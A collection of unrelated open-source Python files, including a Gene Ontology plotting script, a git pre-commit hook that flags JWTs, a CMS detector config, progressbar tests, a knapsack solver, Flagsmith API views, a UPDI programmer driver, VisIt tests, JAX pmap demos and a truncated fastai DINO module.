gosubdag_viral = GoSubDag({goid_chosen}, godag, relationships=True, prt=sys.stdout)
goids_viral = set(gosubdag_viral.go2obj.keys())
with open(fout_obo, 'w') as prt:
WrSubObo.prt_goterms(fin_obo, goids_viral, prt)
print('{N} GO IDs WROTE: {OBO}'.format(N=len(goids_viral), OBO=fout_obo))
# Plot obo subset
pat_r1 = '{REPO}/scripts/go_plot.py {GO} -o {PNG} -r'
pat_r0 = '{REPO}/scripts/go_plot.py {GO} -o {PNG}'
system(pat_r1.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r1.png'), GO=goid_chosen))
system(pat_r0.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r0.png'), GO=goid_chosen))
def _get_leafs_w_relsinhier(rels_usr, gosubdag_r1):
"""Get GO IDs that have all relationships up their hierarchy."""
gos_r1_relsinhier = set()
goids_leaf = set(o.id for o in gosubdag_r1.go2obj.values() if not o.children)
for goid in goids_leaf:
go_parents = gosubdag_r1.rcntobj.go2ancestors[goid]
rels = set(k for p in go_parents for k in gosubdag_r1.go2obj[p].relationship.keys())
if rels == rels_usr:
gos_r1_relsinhier.add(goid)
return gos_r1_relsinhier
def _prt_rtel_ctr(godag):
"""Print the count of relationships."""
objs_r1_all = set(o for o in godag.values() if o.relationship.keys())
octr = cx.Counter(k for o in objs_r1_all for k in o.relationship.keys())
# objs_r1_sub = set(o.id for o in objs_r1_all if not rels_all.isdisjoint(o.relationship.keys()))
print('{N:6,} GO Terms have relationships.'.format(N=len(objs_r1_all)))
for key, cnt in octr.most_common():
print('{N:6,} {REL}'.format(N=cnt, REL=key))
# def _chk_child_parent(go2o_dag, go2o_sub):
# """Check the differences between the two go2obb dicts."""
# pass
if __name__ == '__main__':
test_gosubdag_relationships(len(sys.argv) != 1)
# Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved.
|
.githooks/pre-commit-python.py | eshepelyuk/gloo | 3,506 | 12795733 | #!/usr/bin/python3
# This script runs whenever a user tries to commit something in this repo.
# It checks the commit for any text that resembled an encoded JSON web token,
# and asks the user to verify that they want to commit a JWT if it finds any.
import sys
import subprocess
import re
import base64
import binascii
import unittest
# run test like so:
# (cd .githooks/; python -m unittest pre-commit-python.py)
class TestStringMethods(unittest.TestCase):
def test_jwts(self):
self.assertTrue(contains_jwt(["<KEY>"]))
self.assertTrue(contains_jwt(["<KEY>"]))
def test_ok(self):
self.assertFalse(contains_jwt(["test test"]))
self.assertFalse(contains_jwt(["thisisnotajwteventhoughitisalongstring"]))
def contains_jwt(lines):
jwtPattern = re.compile('JWT|iat|name|sub|alg|exp|k')
raiseIssue = False
for line in lines:
# try to find long (20+ character) words consisting only of valid JWT characters
longTokens = re.findall("[A-Za-z0-9_=-]{20,}", line)
# try to decode any found tokens and see if they look like a JSONfragment
# where :look like a JSON fragment" is defined as "contains any of the words in the 'jwtPattern' regex pattern"
for token in longTokens:
try:
# python's base64 decoder fails if padding is missing; but does not fail if there's
# extra padding; so always add padding
utfOut = base64.urlsafe_b64decode(token+'==').decode("utf-8")
match = jwtPattern.search(utfOut)
if match:
print("Probable JWT found in commit: " + token + " gets decoded into: " + utfOut)
raiseIssue = True
# be very specific about the exceptions we ignore:
except (UnicodeDecodeError, binascii.Error) as e:
continue
return raiseIssue
def main():
#get git diff lines
lines = subprocess.check_output(['git', 'diff', '--staged']).decode("utf-8").split('\n')
# filter out short lines and lines that don't begin with a '+' to only
# test longer, newly added text
filteredLines = list(filter(lambda line : len(line) > 20 and line[0] == '+', lines))
# found a likely JWT, send user through prompt sequence to double check
if contains_jwt(filteredLines):
prompt = "This commit appears to add a JSON web token, which is often accidental and can be problematic (unless it's for a test). Are you sure you want to commit these changes? (y/n): "
failCount = 0
while True:
inputLine = input(prompt).lower()
if len(inputLine) > 0 and inputLine[0] == 'y':
print("OK, proceeding with commit")
return 0
elif len(inputLine) > 0 and inputLine[0] == 'n':
print("Aborting commit")
return 1
elif failCount == 0:
prompt = "Please answer with 'y' or 'n'. Do you wish to proceed with this commit?: "
elif failCount == 1:
prompt = "That's still neither a 'y' nor an 'n'. Do you wish to proceed with this commit?: "
else:
prompt = "You've entered an incorrect input " + str(failCount) + " times now. Please respond with 'y' or 'n' (sans apostrophes) regarding whether or not you wish to proceed with this commit which possibly contains a JWT: "
failCount += 1
else:
print("No likely JWTs found, proceeding with commit")
return 0
if __name__ == "__main__":
sys.exit(main())
|
DQM/CSCMonitorModule/python/csc_dqm_masked_hw_cfi.py | ckamtsikis/cmssw | 852 | 12795741 | <reponame>ckamtsikis/cmssw<filename>DQM/CSCMonitorModule/python/csc_dqm_masked_hw_cfi.py<gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
#--------------------------
# Masked HW Elements
#--------------------------
CSCMaskedHW = cms.untracked.vstring(
# == Post LS1 - All ME4/2 chambers should be enabled
# == mask most or ME+4/2 chambers, except 9,10,11,12,13
#'1,4,2,1,*,*,*',
#'1,4,2,2,*,*,*',
#'1,4,2,3,*,*,*',
#'1,4,2,4,*,*,*',
#'1,4,2,5,*,*,*',
#'1,4,2,6,*,*,*',
#'1,4,2,7,*,*,*',
#'1,4,2,8,*,*,*',
#'1,4,2,14,*,*,*',
#'1,4,2,15,*,*,*',
#'1,4,2,16,*,*,*',
#'1,4,2,17,*,*,*',
#'1,4,2,18,*,*,*',
#'1,4,2,19,*,*,*',
#'1,4,2,20,*,*,*',
#'1,4,2,21,*,*,*',
#'1,4,2,22,*,*,*',
#'1,4,2,23,*,*,*',
#'1,4,2,24,*,*,*',
#'1,4,2,25,*,*,*',
#'1,4,2,26,*,*,*',
#'1,4,2,27,*,*,*',
#'1,4,2,28,*,*,*',
#'1,4,2,29,*,*,*',
#'1,4,2,30,*,*,*',
#'1,4,2,31,*,*,*',
#'1,4,2,32,*,*,*',
#'1,4,2,33,*,*,*',
#'1,4,2,34,*,*,*',
#'1,4,2,35,*,*,*',
#'1,4,2,36,*,*,*',
# == mask all ME-4/2 chambers
#'2,4,2,*,*,*,*',
)
|
tests/test_custom_widgets.py | jerryc05/python-progressbar | 806 | 12795758 | <gh_stars>100-1000
import time
import progressbar
class CrazyFileTransferSpeed(progressbar.FileTransferSpeed):
"It's bigger between 45 and 80 percent"
def update(self, pbar):
if 45 < pbar.percentage() < 80:
return 'Bigger Now ' + progressbar.FileTransferSpeed.update(self,
pbar)
else:
return progressbar.FileTransferSpeed.update(self, pbar)
def test_crazy_file_transfer_speed_widget():
widgets = [
# CrazyFileTransferSpeed(),
' <<<',
progressbar.Bar(),
'>>> ',
progressbar.Percentage(),
' ',
progressbar.ETA(),
]
p = progressbar.ProgressBar(widgets=widgets, max_value=1000)
# maybe do something
p.start()
for i in range(0, 200, 5):
# do something
time.sleep(0.1)
p.update(i + 1)
p.finish()
def test_variable_widget_widget():
widgets = [
' [', progressbar.Timer(), '] ',
progressbar.Bar(),
' (', progressbar.ETA(), ') ',
progressbar.Variable('loss'),
progressbar.Variable('text'),
progressbar.Variable('error', precision=None),
progressbar.Variable('missing'),
progressbar.Variable('predefined'),
]
p = progressbar.ProgressBar(widgets=widgets, max_value=1000,
variables=dict(predefined='predefined'))
p.start()
print('time', time, time.sleep)
for i in range(0, 200, 5):
time.sleep(0.1)
p.update(i + 1, loss=.5, text='spam', error=1)
i += 1
p.update(i, text=None)
i += 1
p.update(i, text=False)
i += 1
p.update(i, text=True, error='a')
p.finish()
def test_format_custom_text_widget():
widget = progressbar.FormatCustomText(
'Spam: %(spam).1f kg, eggs: %(eggs)d',
dict(
spam=0.25,
eggs=3,
),
)
bar = progressbar.ProgressBar(widgets=[
widget,
])
for i in bar(range(5)):
widget.update_mapping(eggs=i * 2)
assert widget.mapping['eggs'] == bar.widgets[0].mapping['eggs']
|
Algorithms/Dynamic_Programming/0-1_Knapsack_Problem/knapsack_problem_0_1.py | arslantalib3/algo_ds_101 | 182 | 12795769 | <reponame>arslantalib3/algo_ds_101<filename>Algorithms/Dynamic_Programming/0-1_Knapsack_Problem/knapsack_problem_0_1.py
#0/1 Knapsack problem
def knapsack(val, wt, N, C):
table = [[ 0 for _ in range(0, C+1)] for _ in range(0, N+1)]
table[0][0] = 0
for i in range(1, N+1):
for c in range(1, C+1):
if c - wt[i-1] < 0:
table[i][c] = table[i-1][c]
else:
table[i][c] = max(table[i-1][c], table[i-1][c-wt[i-1]]+val[i-1])
return table[N][C]
N = int(input().strip())
W = int(input().strip()) # capacity
val = [ int(v) for v in input().strip().split(" ")]
wt = [ int(w) for w in input().strip().split(" ")]
print(knapsack(val, wt, N, W)) |
api/edge_api/identities/views.py | SolidStateGroup/Bullet-Train-API | 126 | 12795795 | import base64
import json
import typing
import marshmallow
from boto3.dynamodb.conditions import Key
from drf_yasg2.utils import swagger_auto_schema
from flag_engine.api.schemas import APITraitSchema
from flag_engine.identities.builders import (
build_identity_dict,
build_identity_model,
)
from rest_framework import status, viewsets
from rest_framework.decorators import action
from rest_framework.exceptions import NotFound, ValidationError
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from app.pagination import EdgeIdentityPagination
from edge_api.identities.serializers import (
EdgeIdentityFeatureStateSerializer,
EdgeIdentityFsQueryparamSerializer,
EdgeIdentitySerializer,
EdgeIdentityTraitsSerializer,
)
from environments.identities.models import Identity
from environments.models import Environment
from environments.permissions.constants import MANAGE_IDENTITIES
from environments.permissions.permissions import NestedEnvironmentPermissions
from features.permissions import IdentityFeatureStatePermissions
from projects.exceptions import DynamoNotEnabledError
from .exceptions import TraitPersistenceError
trait_schema = APITraitSchema()
class EdgeIdentityViewSet(viewsets.ModelViewSet):
serializer_class = EdgeIdentitySerializer
pagination_class = EdgeIdentityPagination
lookup_field = "identity_uuid"
dynamo_identifier_search_functions = {
"EQUAL": lambda identifier: Key("identifier").eq(identifier),
"BEGINS_WITH": lambda identifier: Key("identifier").begins_with(identifier),
}
def initial(self, request, *args, **kwargs):
environment = self.get_environment_from_request()
if not environment.project.enable_dynamo_db:
raise DynamoNotEnabledError()
super().initial(request, *args, **kwargs)
def _get_search_function_and_value(
self,
search_query: str,
) -> typing.Tuple[typing.Callable, str]:
if search_query.startswith('"') and search_query.endswith('"'):
return self.dynamo_identifier_search_functions[
"EQUAL"
], search_query.replace('"', "")
return self.dynamo_identifier_search_functions["BEGINS_WITH"], search_query
def get_object(self):
return Identity.dynamo_wrapper.get_item_from_uuid_or_404(
self.kwargs["identity_uuid"]
)
def get_queryset(self):
page_size = self.pagination_class().get_page_size(self.request)
previous_last_evaluated_key = self.request.GET.get("last_evaluated_key")
search_query = self.request.query_params.get("q")
start_key = None
if previous_last_evaluated_key:
start_key = json.loads(base64.b64decode(previous_last_evaluated_key))
if not search_query:
return Identity.dynamo_wrapper.get_all_items(
self.kwargs["environment_api_key"], page_size, start_key
)
search_func, search_identifier = self._get_search_function_and_value(
search_query
)
identity_documents = Identity.dynamo_wrapper.search_items_with_identifier(
self.kwargs["environment_api_key"],
search_identifier,
search_func,
page_size,
start_key,
)
return identity_documents
def get_permissions(self):
return [
IsAuthenticated(),
NestedEnvironmentPermissions(
action_permission_map={
"retrieve": MANAGE_IDENTITIES,
"get_traits": MANAGE_IDENTITIES,
"update_traits": MANAGE_IDENTITIES,
}
),
]
def get_environment_from_request(self):
"""
Get environment object from URL parameters in request.
"""
return Environment.objects.get(api_key=self.kwargs["environment_api_key"])
def perform_destroy(self, instance):
Identity.dynamo_wrapper.delete_item(instance["composite_key"])
@swagger_auto_schema(
responses={200: EdgeIdentityTraitsSerializer(many=True)},
)
@action(detail=True, methods=["get"], url_path="list-traits")
def get_traits(self, request, *args, **kwargs):
identity = self.get_object()
data = trait_schema.dump(identity["identity_traits"], many=True)
return Response(data=data, status=status.HTTP_200_OK)
@swagger_auto_schema(
method="put",
request_body=EdgeIdentityTraitsSerializer,
responses={200: EdgeIdentityTraitsSerializer()},
)
@action(detail=True, methods=["put"], url_path="update-traits")
def update_traits(self, request, *args, **kwargs):
environment = self.get_environment_from_request()
if not environment.project.organisation.persist_trait_data:
raise TraitPersistenceError()
identity = build_identity_model(self.get_object())
try:
trait = trait_schema.load(request.data)
except marshmallow.ValidationError as validation_error:
raise ValidationError(validation_error) from validation_error
identity.update_traits([trait])
Identity.dynamo_wrapper.put_item(build_identity_dict(identity))
data = trait_schema.dump(trait)
return Response(data, status=status.HTTP_200_OK)
class EdgeIdentityFeatureStateViewSet(viewsets.ModelViewSet):
permission_classes = [IsAuthenticated, IdentityFeatureStatePermissions]
lookup_field = "featurestate_uuid"
serializer_class = EdgeIdentityFeatureStateSerializer
# Patch is not supported
http_method_names = [
"get",
"post",
"put",
"delete",
"head",
"options",
"trace",
]
pagination_class = None
def initial(self, request, *args, **kwargs):
super().initial(request, *args, **kwargs)
identity_document = Identity.dynamo_wrapper.get_item_from_uuid_or_404(
self.kwargs["edge_identity_identity_uuid"]
)
self.identity = build_identity_model(identity_document)
def get_object(self):
featurestate_uuid = self.kwargs["featurestate_uuid"]
try:
featurestate = next(
filter(
lambda fs: fs.featurestate_uuid == featurestate_uuid,
self.identity.identity_features,
)
)
except StopIteration:
raise NotFound()
return featurestate
@swagger_auto_schema(query_serializer=EdgeIdentityFsQueryparamSerializer())
def list(self, request, *args, **kwargs):
q_params_serializer = EdgeIdentityFsQueryparamSerializer(
data=self.request.query_params
)
q_params_serializer.is_valid(raise_exception=True)
identity_features = self.identity.identity_features
feature = q_params_serializer.data.get("feature")
if feature:
identity_features = filter(
lambda fs: fs.feature.id == feature, identity_features
)
serializer = self.get_serializer(identity_features, many=True)
return Response(data=serializer.data, status=status.HTTP_200_OK)
def perform_destroy(self, instance):
self.identity.identity_features.remove(instance)
Identity.dynamo_wrapper.put_item(build_identity_dict(self.identity))
|
updi/link.py | leonerd/pyupdi | 197 | 12795814 | <reponame>leonerd/pyupdi
"""
Link layer in UPDI protocol stack
"""
import logging
import time
from updi.physical import UpdiPhysical
import updi.constants as constants
class UpdiDatalink(object):
"""
UPDI data link class handles the UPDI data protocol within the device
"""
def __init__(self, comport, baud):
self.logger = logging.getLogger("link")
# Create a UPDI physical connection
self.use24bit=False
self.updi_phy = UpdiPhysical(comport, baud)
# Initialise
self.init()
# Check
if not self.check():
# Send double break if all is not well, and re-check
self.updi_phy.send_double_break()
self.init()
if not self.check():
raise Exception("UPDI initialisation failed")
def set_24bit_updi(self, mode):
self.logger.info("Using 24-bit updi")
self.use24bit = mode
def init(self):
"""
Set the inter-byte delay bit and disable collision detection
"""
self.stcs(constants.UPDI_CS_CTRLB, 1 << constants.UPDI_CTRLB_CCDETDIS_BIT)
self.stcs(constants.UPDI_CS_CTRLA, 1 << constants.UPDI_CTRLA_IBDLY_BIT)
def check(self):
"""
Check UPDI by loading CS STATUSA
"""
if self.ldcs(constants.UPDI_CS_STATUSA) != 0:
self.logger.info("UPDI init OK")
return True
self.logger.info("UPDI not OK - reinitialisation required")
return False
def ldcs(self, address):
"""
Load data from Control/Status space
"""
self.logger.info("LDCS from 0x{0:02X}".format(address))
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LDCS | (address & 0x0F)])
response = self.updi_phy.receive(1)
if len(response) != 1:
# Todo - flag error
return 0x00
return response[0]
def stcs(self, address, value):
"""
Store a value to Control/Status space
"""
self.logger.info("STCS 0x{0:02X} to 0x{1:02X}".format(value, address))
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_STCS | (address & 0x0F), value])
def ld(self, address):
"""
Load a single byte direct from a 16/24-bit address
"""
self.logger.info("LD from 0x{0:06X}".format(address))
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_8,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_8,
address & 0xFF, (address >> 8) & 0xFF])
return self.updi_phy.receive(1)[0]
def ld16(self, address):
"""
Load a 16-bit word directly from a 16/24-bit address
"""
self.logger.info("LD from 0x{0:06X}".format(address))
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_LDS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF])
return self.updi_phy.receive(2)
def st(self, address, value):
"""
Store a single byte value directly to a 16/24-bit address
"""
self.logger.info("ST to 0x{0:06X}".format(address))
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_8,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_8,
address & 0xFF, (address >> 8) & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st")
self.updi_phy.send([value & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st")
def st16(self, address, value):
"""
Store a 16-bit word value directly to a 16/24-bit address
"""
self.logger.info("ST to 0x{0:06X}".format(address))
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_24 | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_STS | constants.UPDI_ADDRESS_16 | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st")
self.updi_phy.send([value & 0xFF, (value >> 8) & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st")
def ld_ptr_inc(self, size):
"""
Loads a number of bytes from the pointer location with pointer post-increment
"""
self.logger.info("LD8 from ptr++")
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LD | constants.UPDI_PTR_INC |
constants.UPDI_DATA_8])
return self.updi_phy.receive(size)
def ld_ptr_inc16(self, words):
"""
Load a 16-bit word value from the pointer location with pointer post-increment
"""
self.logger.info("LD16 from ptr++")
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_LD | constants.UPDI_PTR_INC |
constants.UPDI_DATA_16])
return self.updi_phy.receive(words << 1)
def st_ptr(self, address):
"""
Set the pointer location
"""
self.logger.info("ST to ptr")
if self.use24bit:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_ADDRESS | constants.UPDI_DATA_24,
address & 0xFF, (address >> 8) & 0xFF, (address >> 16) & 0xFF])
else:
self.updi_phy.send(
[constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_ADDRESS | constants.UPDI_DATA_16,
address & 0xFF, (address >> 8) & 0xFF])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st_ptr")
def st_ptr_inc(self, data):
"""
Store data to the pointer location with pointer post-increment
"""
self.logger.info("ST8 to *ptr++")
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_INC | constants.UPDI_DATA_8,
data[0]])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("ACK error with st_ptr_inc")
n = 1
while n < len(data):
self.updi_phy.send([data[n]])
response = self.updi_phy.receive(1)
if len(response) != 1 or response[0] != constants.UPDI_PHY_ACK:
raise Exception("Error with st_ptr_inc")
n += 1
def st_ptr_inc16(self, data):
"""
Store a 16-bit word value to the pointer location with pointer post-increment
Disable acks when we do this, to reduce latency.
"""
self.logger.info("ST16 to *ptr++")
ctrla_ackon = 1 << constants.UPDI_CTRLA_IBDLY_BIT # with acks enabled.
ctrla_ackoff = ctrla_ackon | (1 << constants.UPDI_CTRLA_RSD_BIT) # acks off. (RSD)
# (Response signature disable)
self.stcs(constants.UPDI_CS_CTRLA, ctrla_ackoff)
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_ST | constants.UPDI_PTR_INC |
constants.UPDI_DATA_16] )
self.updi_phy.send(data) # No response expected.
# Re-enable acks
self.stcs(constants.UPDI_CS_CTRLA, ctrla_ackon)
def repeat(self, repeats):
"""
Store a value to the repeat counter
"""
if (repeats - 1) > constants.UPDI_MAX_REPEAT_SIZE:
raise Exception("Invalid repeat count!")
self.logger.info("Repeat {0:d}".format(repeats))
repeats -= 1
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_REPEAT | constants.UPDI_REPEAT_BYTE,
repeats & 0xFF])
def read_sib(self):
"""
Read the SIB
"""
return self.updi_phy.sib()
def key(self, size, key):
"""
Write a key
"""
self.logger.info("Writing key")
if len(key) != 8 << size:
raise Exception("Invalid KEY length!")
self.updi_phy.send([constants.UPDI_PHY_SYNC, constants.UPDI_KEY | constants.UPDI_KEY_KEY | size])
self.updi_phy.send(list(reversed(list(key))))
|
src/test/tests/databases/xform_precision.py | visit-dav/vis | 226 | 12795852 | # ----------------------------------------------------------------------------
# CLASSES: nightly
#
# Test Case: xform_precision.py
#
# Tests: Transform manager's conversion to float
#
# Programmer: <NAME>
# Date: September 24, 2006
#
# Modifications:
#
# <NAME>, Wed Jan 20 07:37:11 PST 2010
# Added ability to swtich between Silo's HDF5 and PDB data.
# ----------------------------------------------------------------------------
OpenDatabase(silo_data_path("quad_disk.silo"))
#
# Turn off force single precision for this test
#
readOptions=GetDefaultFileOpenOptions("Silo")
readOptions["Force Single"] = 0
SetDefaultFileOpenOptions("Silo", readOptions)
#
# Test ordinary float data (no conversion) first
#
AddPlot("Mesh","mesh")
DrawPlots()
Test("float_xform_01")
DeleteAllPlots()
#
# Ok, now read a mesh with double coords
#
AddPlot("Mesh","meshD")
DrawPlots()
Test("float_xform_02")
DeleteAllPlots()
CloseDatabase(silo_data_path("quad_disk.silo"))
OpenDatabase(silo_data_path("quad_disk.silo"))
#
# test float data on a float mesh
#
AddPlot("Pseudocolor","sphElev_on_mesh")
DrawPlots()
Test("float_xform_03")
DeleteAllPlots()
#
# test float data on a double mesh
#
AddPlot("Pseudocolor","sphElev_on_meshD")
DrawPlots()
Test("float_xform_04")
DeleteAllPlots()
#
# test double data on a float mesh
#
AddPlot("Pseudocolor","sphElevD_on_mesh")
DrawPlots()
Test("float_xform_05")
DeleteAllPlots()
CloseDatabase(silo_data_path("quad_disk.silo"))
OpenDatabase(silo_data_path("quad_disk.silo"))
#
# test double data on a double mesh
#
AddPlot("Pseudocolor","sphElevD_on_meshD")
DrawPlots()
Test("float_xform_06")
DeleteAllPlots()
Exit()
|
qt__pyqt__pyside__pyqode/pyqt5__draw_text_with_word_wrap.py | DazEB2/SimplePyScripts | 117 | 12795866 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from PyQt5.QtGui import QPixmap, QPainter, QFont
from PyQt5.QtWidgets import QApplication, QLabel
from PyQt5.QtCore import Qt, QRect
app = QApplication([])
text = "Hello World!"
pixmap = QPixmap(180, 130)
pixmap.fill(Qt.white)
painter = QPainter(pixmap)
painter.setFont(QFont('Arial', 12))
rect = QRect(0, 0, 70, 50)
painter.drawRect(rect)
painter.drawText(rect, Qt.TextWordWrap, text)
rect = QRect(0, 60, 70, 50)
painter.drawRect(rect)
painter.drawText(rect, Qt.AlignLeft, text)
w = QLabel()
w.setPixmap(pixmap)
w.show()
app.exec()
|
playground/jax_basic/test_pmap.py | yf225/alpa | 114 | 12795916 | <reponame>yf225/alpa
from functools import partial
import jax
from jax import lax
import jax.numpy as jnp
def debug_pmap():
@jax.pmap
def func(x, w):
return x @ w
y = func(jnp.ones((2, 4)), jnp.ones((2, 4)))
print(y, type(y))
def test_nested_pmap():
@partial(jax.pmap, axis_name='a0', in_axes=(0, None), out_axes=0)
def add(a, b):
# a.shape = (32, 64)
# b.shape = (64, 2, 32)
@partial(jax.pmap, axis_name='a1', in_axes=(None, 1), out_axes=1)
def add_inner(x, y):
# x.shape = (32, 64)
# y.shape = (64, 32)
return x @ y
# ret.shape = (32, 2, 32)
ret = add_inner(a, b)
return ret
a = jnp.ones((2, 32, 64))
b = jnp.ones((64, 2, 32))
#jaxpr = jax.make_jaxpr(add)(a, b)
#print(jaxpr)
#print(jaxpr.jaxpr.outvars[0].aval.shape)
c = add(a, b)
print(c)
def test_allreduce_sum():
@partial(jax.pmap, axis_name='i')
def normalize(x):
return x / lax.psum(x, 'i')
print(normalize(jnp.arange(2)))
if __name__ == "__main__":
#debug_pmap()
#test_nested_pmap()
test_allreduce_sum()
|
self_supervised/vision/dino.py | jwuphysics/self_supervised | 243 | 12795932 | <gh_stars>100-1000
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/15 - dino.ipynb (unless otherwise specified).
__all__ = ['DINOHead', 'get_dino_aug_pipelines', 'DINOModel', 'DINO']
# Cell
from fastai.vision.all import *
from ..augmentations import *
from ..layers import *
from ..models.vision_transformer import *
# Cell
class DINOHead(nn.Module):
'''
copy.deepcopy:
RuntimeError: Only Tensors created explicitly by the user (graph leaves)
support the deepcopy protocol at the moment
https://pytorch.org/docs/stable/generated/torch.nn.utils.weight_norm.html
https://pytorch.org/docs/stable/generated/torch.nn.GELU.html
'''
def __init__(self, in_dim, out_dim, use_bn=False, norm_last_layer=True, nlayers=3, hidden_dim=2048, bottleneck_dim=256):
super().__init__()
nlayers = max(nlayers, 1)
if nlayers == 1:
self.mlp = nn.Linear(in_dim, bottleneck_dim)
else:
layers = [nn.Linear(in_dim, hidden_dim)]
if use_bn:
layers.append(nn.BatchNorm1d(hidden_dim))
layers.append(nn.GELU())
for _ in range(nlayers - 2):
layers.append(nn.Linear(hidden_dim, hidden_dim))
if use_bn:
layers.append(nn.BatchNorm1d(hidden_dim))
layers.append(nn.GELU())
layers.append(nn.Linear(hidden_dim, bottleneck_dim))
self.mlp = nn.Sequential(*layers)
self.apply(self._init_weights)
self.last_layer = nn.utils.weight_norm(nn.Linear(bottleneck_dim, out_dim, bias=False))
self.last_layer.weight_g.data.fill_(1)
if norm_last_layer:
self.last_layer.weight_g.requires_grad = False
def _init_weights(self, m):
if isinstance(m, nn.Linear):
trunc_normal_(m.weight, std=.02)
if isinstance(m, nn.Linear) and m.bias is not None:
nn.init.constant_(m.bias, 0)
def forward(self, x):
x = self.mlp(x)
x = nn.functional.normalize(x, dim=-1, p=2)
x = self.last_layer(x)
return x
# Cell
@delegates(get_multi_aug_pipelines, but=['n', 'size', 'resize_scale'])
def get_dino_aug_pipelines(num_crops=(2,4), crop_sizes=(224,96), min_scales=(0.4,0.05), max_scales=(1.,0.4), **kwargs):
aug_pipelines = []
for nc, size, mins, maxs in zip(num_crops, crop_sizes, min_scales, max_scales):
aug_pipelines += get_multi_aug_pipelines(n=nc, size=size, resize_scale=(mins,maxs), **kwargs)
return aug_pipelines
# Cell
class DINOModel(Module):
def __init__(self, student, teacher):
"A module for loading and saving all training params together"
self.student,self.teacher = student,teacher
self.teacher.load_state_dict(student.state_dict())
for p in self.teacher.parameters(): p.requires_grad = False
self.register_buffer('C', torch.zeros(1,num_features_model(teacher)))
def forward(self,x): return self.student(x)
# Cell
class DINO(Callback):
order,run_valid = 9,True
def __init__(self, aug_pipelines, large_crop_ids=[0,1],
cmom=0.9,
tmom_start=0.996, tmom_end=1., tmom_sched=SchedCos,
tpt_start=0.04, tpt_end=0.04, tpt_warmup_pct=0., tpt_sched=SchedLin,
tps=0.1,
freeze_last_layer=1,
print_augs=False):
"""
DINO teacher student training with distillation.
Refer to original repo:
https://github.com/facebookresearch/dino/blob/0be6e112dd579203caaa1d0f066e29ca536f76dd/main_dino.py#L41
cmom: Center update momentum.
tmom: Teacher update momentum. Set larger, e.g. 0.9995, for small batches or 0.996 for large batches (256+).
tpt_warmup: Warm up starting temperature
tpt_warmup_pct: Percentage of training for warmup
tpt_sched: Warm up scheduler, e.g. SchedLin, SchedCos, SchedExp
tpt: Teacher temperature after warm up. Decrease if training loss does not decrease.
Smaller temperature means more sharpening.
tps: Student temperature.
freeze_last_layer: How many epochs to freeze the last layer
"""
store_attr('large_crop_ids,cmom,freeze_last_layer,tps')
self.augs = aug_pipelines
self.tpt_scheduler = combine_scheds([tpt_warmup_pct,1-tpt_warmup_pct],
[tpt_sched(tpt_start,tpt_end),SchedNo(tpt_end,tpt_end)])
self.tmom_scheduler = tmom_sched(tmom_start, tmom_end)
if print_augs:
for aug in self.augs: print(aug)
def before_fit(self):
"Create teacher model as a copy of student"
self.learn.loss_func = self.lf
self.tpt = self.tpt_scheduler(0.)
self.tmom = self.tmom_scheduler(0.)
self.model.teacher.eval()
for n,p in self.learn.model.student[1].last_layer.named_parameters():
if n == 'weight_v' : p.requires_grad = False
def before_batch(self):
"Augment multi crop views"
self.bs = self.x.size(0)
self.learn.xb = ([aug(self.x) for aug in self.augs],)
x_large = [self.learn.xb[0][i] for i in self.large_crop_ids]
# TODO: Do we need to put the teacher in eval(), not it original repo?
with torch.no_grad():
targs = self.model.teacher(x_large)
self.learn.yb = (targs,)
self.cb = targs.mean(0, keepdim=True)
def _momentum_update_teacher(self):
